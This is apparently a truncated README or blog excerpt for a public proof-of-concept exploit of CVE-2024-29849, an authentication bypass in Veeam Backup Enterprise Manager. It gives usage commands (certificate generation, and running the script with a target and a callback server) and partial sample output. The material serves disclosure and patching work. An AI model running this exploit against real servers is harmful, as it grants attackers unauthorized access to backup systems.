CVE-2024-29849 Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) Technical Analysis A root cause analysis of the vulnerability can be found on my blog Summary Supported versions? According to Veeam official advisory, all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 are vulnerable Usage First, you need to have the right setup for a local HTTPS setup, use the following commands plaintext openssl req -new -x509 -keyout key.pem -out server.pem -days 365 -nodes “`plaintext python CVE-2024-29849.py –target https://192.168.253.180:9398/ –callback-server 192.168.253.1:443 _ _ _ _ _ _ __ _ __ _ _ _ _ _ | | | | | | | | | | | | | | | | | _ | |__ || | | | | || | | | | | | |_____| | _| |__ | _| |_| . | |____ | | | | | (*) Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849) (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam) (*) Technical details: https://summoning.team/blog/veeam-cve-2024-29849-authentication-bypass/ () Target https://192.168.253.180:9398 is reachable and seems to be a Veeam Backup Enterprise Manager () Fetching certificate for 192.168.253.180 () Common Name (CN) extracted from certificate: batserver.evilcorp.local () Assumed domain name: evilcorp.local (?) Is the assumed domain name correct(Y/n)?y () Target domain name is:…Read More